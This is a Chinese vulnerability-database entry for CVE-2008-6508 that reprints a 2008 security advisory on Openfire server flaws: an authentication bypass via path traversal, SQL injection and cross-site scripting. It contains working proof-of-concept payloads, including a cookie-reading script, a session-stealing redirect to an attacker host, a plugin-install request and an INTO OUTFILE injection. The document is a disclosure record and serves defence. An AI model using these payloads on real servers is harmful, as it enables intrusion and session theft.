Igniterealtime Openfire管理终端目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116701 漏洞类型 路径遍历
发布时间 2008-11-09 更新时间 2009-03-26
CVE编号 CVE-2008-6508 CNNVD-ID CNNVD-200903-364
漏洞平台 JSP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7075
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-364
|漏洞详情
Openfire(前称Wildfire)是IgniteRealtime社区的一款采用Java开发且基于XMPP(前称Jabber,即时通讯协议)的跨平台开源实时协作(RTC)服务器,它能够构建高效率的即时通信服务器,并支持上万并发用户数量。在对openfire管理接口的认证中,Tomcat应用服务器中的过滤器org.jivesoftware.admin.AuthCheckFilter确保仅有通过认证的用户才可以访问管理接口,否则将会被重新定向到登录页面。Openfire中的一个错误可能导致无需管理用户凭据便访问内部功能。部署描述符(web.xml)配置了一些AuthCheckFilter的exclude值:AuthCheckorg.jivesoftware.admin.AuthCheckFilterexcludeslogin.jsp,index.jsp?logout=true,setup/index.jsp,setup/setup-,.gif,.png,error-serverdown.jsp如果请求URL包含有任意Exclude字符串的话,就可以绕过检查机制。
|漏洞EXP
Advisory:               Openfire Server Multiple Vulnerabilities
Advisory ID:            AKADV2008-001
Release Date:           2008/11/07
Revision:               1.0
Last Modified:          2008/11/07
Date Reported:          2008/05/17
Author:                 Andreas Kurtz (mail at andreas-kurtz.de)
Affected Software:      Openfire Server <= 3.6.0a
Remotely Exploitable:   Yes
Risk:                   Critical (x) High ( ) Medium ( ) Low ( )
Vendor URL:             http://www.igniterealtime.org
                        http://www.jivesoftware.com/
Vendor Status:          No patch released yet.
Patch development time: N/A


Vulnerability description:
--------------------------

The jabber server Openfire (<= version 3.6.0a) contains several serious
vulnerabilities. Depending on the particular runtime environment these
issues can potentially even be used by an attacker to execute code
on operating system level.

1) Authentication bypass
This vulnerability provides an attacker full access to all functions
in the admin webinterface without providing any user credentials.
The Tomcat filter which is responsible for authentication could be
completely circumvented.

2) SQL injection
It is possible to pass SQL statements to the backend database through
a SQL injection vulnerability. Depending on the particular
runtime environment and database permissions it is even possible to
write files to disk and execute code on operating system level.

3) Multiple Cross-Site Scripting
Permits arbitrary insertion of HTML- and JavaScript code in login.jsp.
An attacker could also manipulate a parameter to specify
a destination to which a user will be forwarded to after successful
authentication.


Technical details:
------------------

1) Authentication bypass
Authentication to the openfire admin interface is secured by a filter in
the Tomcat application server (org.jivesoftware.admin.AuthCheckFilter).
This filter guarantees that access to the admin interface is only granted
to authenticated users. Otherwise they get redirected to a login page.

A design error in Openfire enables access to internal functions
without the need for admin user credentials.
The deployment descriptor (web.xml) configures some exclude values
for the AuthCheckFilter:

<filter>   
  <filter-name>AuthCheck</filter-name>
  <filter-class>org.jivesoftware.admin.AuthCheckFilter</filter-class>
  <init-param>
    <param-name>excludes</param-name>       
    <param-value>login.jsp,index.jsp?logout=true,setup/index.jsp,
            setup/setup-,.gif,.png,error-serverdown.jsp</param-value>
  </init-param>
</filter>

When a request URL contains one of these Exclude-Strings the
auth check mechanism is totally circumvented. This was considered
necessary for the initial setup process or the presence plugin.
Following POC demonstrates how an attacker could access
internal functions by manipulating the URL providing one of these
excludes(/setup/setup-/../../):

http://www.foo.bar:9090/setup/setup-/../../log.jsp?log=info&mode=asc&lines=
All

2) SQL injection
The parameter "type" in sipark-log-summary.jsp is prone to
SQL injection. Untrusted user data enters the application in
sipark-log-summary.jsp (line 163):

    String type = ParamUtils.getParameter(request, "type");

The function getCalls() in org.jivesoftware.openfire.sip.calllog.CallLogDAO
processes this user input (SQLCondition) and constructs a SQL statement:

    String sql = "SELECT * FROM sipPhoneLog";

    sql = SQLCondition != null && !SQLCondition.equals("") ?
          sql + " WHERE " + SQLCondition : sql;

    sql += " ORDER BY datetime DESC";
       
That statement is executed in the method
createScrollablePreparedStatement()
in CallLogDAO (line 411):

    return con.prepareStatement(sql);
    
In that case there is a SQL injection vulnerability present even though
prepared statemens are used. This happens because the string sql is
dynamically
concatenated *before* it is passed to the prepared statement object.

3) Cross-Site Scripting
The parameter "url" in login.jsp was vulnerable to Cross-Site Scripting
(XSS).
This vulnerability is the only one which was fixed within the last 6
months.

http://www.foo.bar:9090/login.jsp?url="/><script>alert(document.cookie);</s
cript>
                       
An attacker could also manipulate the parameter to specify a
destination to which a user will be forwarded to after successful
authentication:

http://www.foo.bar:9090/login.jsp?url=http://www.attacker.com/StealSession

If a user authenticates using that link it is easily possible for an
attacker to hijack the users session.

Furthermore the parameter "username" in login.jsp is still vulnerable
to Cross-Site Scripting attacks.

    
Putting it all together:
------------------------

Since the SIP-Plugin is deactivated by default, an attacker needs to
install it using the authentication bypass vulnerability and the
following POST request:

POST
http://www.foo.bar:9090/setup/setup-/../../dwr/exec/downloader.installPlugi
n.dwr HTTP/1.1
Host: www.foo.bar:9090

callCount=1
c0-scriptName=downloader
c0-methodName=installPlugin
c0-id=7931_1210973487852
c0-param0=string:http%3A%2F%2Fwww.igniterealtime.org%2Fprojects%2Fopenfire%
2Fplugins%2Fsip.jar
c0-param1=string:661780277
xml=true

After that activation the described SQL injection vulnerability can
be used in a single unauthenticated request.
The following proof of concept uses a mysql database:

http://www.foo.bar:9090/setup/setup-/../../plugins/sip/sipark-log-summary.j
sp?
type=all'UNION%20SELECT%20'attack-code'%20INTO%20OUTFILE%20'/tmp/attack.sh'
%20/*&startDate=Any&endDate=Any&submit=true&get=Search


Solution:
---------

Since the vendor didn't release a patch within the last 6 months it is
highly recommended to deactivate access to the entire admin interface.
This can be achieved for example by blocking the according ports
(tcp/9090 & tcp/9091 by default) with a firewall. Following communication
to the admin interface can be done via SSL tunnels.

For more details see: http://www.andreas-kurtz.de/archives/63


History:
--------

  2008/05/17 - Vendor notified using sales@jivesoftware.com
  2008/05/18 - Vendor notified using gaston@jivesoftware.com
  2008/05/20 - Vendor response
  2008/05/20 - Detailed vulnerability information sent to the vendor
  2008/05/21 - Vendor confirms the vulnerability
  2008/08/18 - Asked vendor for up to date information regarding the
reported issues
  2008/10/18 - Again asked vendor for up to date information regarding the
reported issues
  2008/10/31 - Informed vendor of planned advisory realease on 2008/11/05
(no response)
  2008/11/07 - Full technical details and recommended measures released to general public
       

Credits:
--------

  Vulnerability found and advisory written by Andreas Kurtz.


References:
-----------

  http://www.andreas-kurtz.de/archives/63


Changes:
--------

  Revision 0.1 - Initial draft release to the vendor
  Revision 1.0 - Final version released to general public


Disclaimer:
-----------

The information within this advisory may change without notice. Use
of this information constitutes acceptance for use in an AS IS
condition. There are no warranties, implied or express, with regard
to this information. In no event shall the author be liable for any
direct or indirect damages whatsoever arising out of or in connection
with the use or spread of this information. Any use of this
information is at the user's own risk.

# milw0rm.com [2008-11-09]
|参考资料

来源:www.igniterealtime.org
链接:http://www.igniterealtime.org/issues/browse/JM-1489
来源:www.igniterealtime.org
链接:http://www.igniterealtime.org/builds/openfire/docs/latest/changelog.html
来源:XF
名称:openfire-authcheckfilter-security-bypass(46488)
链接:http://xforce.iss.net/xforce/xfdb/46488
来源:VUPEN
名称:ADV-2008-3061
链接:http://www.vupen.com/english/advisories/2008/3061
来源:BID
名称:32189
链接:http://www.securityfocus.com/bid/32189
来源:BUGTRAQ
名称:20081108[AK-ADV2008-001]OpenfireJabber-Server:MultipleVulnerabilities(AuthenticationBypass,SQLinjection,...)
链接:http://www.securityfocus.com/archive/1/archive/1/498162/100/0/threaded
来源:MILW0RM
名称:7075
链接:http://www.milw0rm.com/exploits/7075
来源:MISC
链接:http://www.andreas-kurtz.de/archives/63
来源:MISC
链接:http://www.andreas-kurtz.de/advisories/AKADV2008-001-v1.0.txt
来源:SECUNIA
名称:32478
链接:http://secunia.com/advisories/32478
来源:OSVDB
名称:49663
链接:http://osvdb.org/49663